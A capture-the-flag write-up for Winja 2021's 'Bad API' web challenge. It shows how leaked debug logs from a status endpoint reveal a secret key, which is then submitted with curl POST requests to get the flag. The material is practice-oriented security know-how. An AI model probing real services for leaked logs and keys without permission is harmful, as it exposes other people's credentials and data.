Winja 2021 — Bad API — writeup

The challenge is a web page, with a username field.
After trying with “admin”, we receive the message:
“Secret key provided is invalid. Please try again.”
Checking the Network tab on Chrome DevTools, it’s:
username: admin
Mechanic: Somebody set up us the bomb. Operator: Main screen turn on.
So lets find this secret key, checking the console we can see that there is a recurring call to the endpoint
curl -X GET
The response to this request is:
“Log dump not ready”
after a few seconds it returned the message:
“Dump ready at endpoint (v1)”
So now we will try to find this dump, analyzing the status url we will try to do a get at the endpoint
curl -X GET
Analysing the response we can see some interesting information leaked:
… — process_form()] ImmutableMultiDict([(‘username’, ‘SECRET’), (‘secret_key’, ‘S’)])
[ — process_form()] Expected key ALLYOURBASEAREBELONGTOUS not recieved. Redirecting to 404…
[ — process_form()] Request recieved:
[ — process_form()] ImmutableMultiDict([(‘username’, ‘’), (‘secret_key’, ‘SECRET’)])
[ — process_form()] Request recieved:
[ — process_form()] ImmutableMultiDict([(‘username’, ‘admin’), (‘secret_key’, ‘\r\nMechanic: Somebody set up us the bomb. Operator: Main screen turn on.\r\n ‘)])
[ — process_form()] Expected key (censored) not recieved. Redirecting to 404…
As we can see there are some logs related to secret_key and some secret tips that we can try to use, like ALLYOURBASEAREBELONGTOUS
curl -X POST -F “username=admin” -F “secret_key=ALLYOURBASEAREBELONGTOUS”
We got a redirect, so it’s a wrong secret_key, but we have another secret_key on the first log, (censored)
curl -X POST -F “username=admin” -F “secret_key=(censored)”
Now we got an HTML response, with the flag!!
Keep Hacking!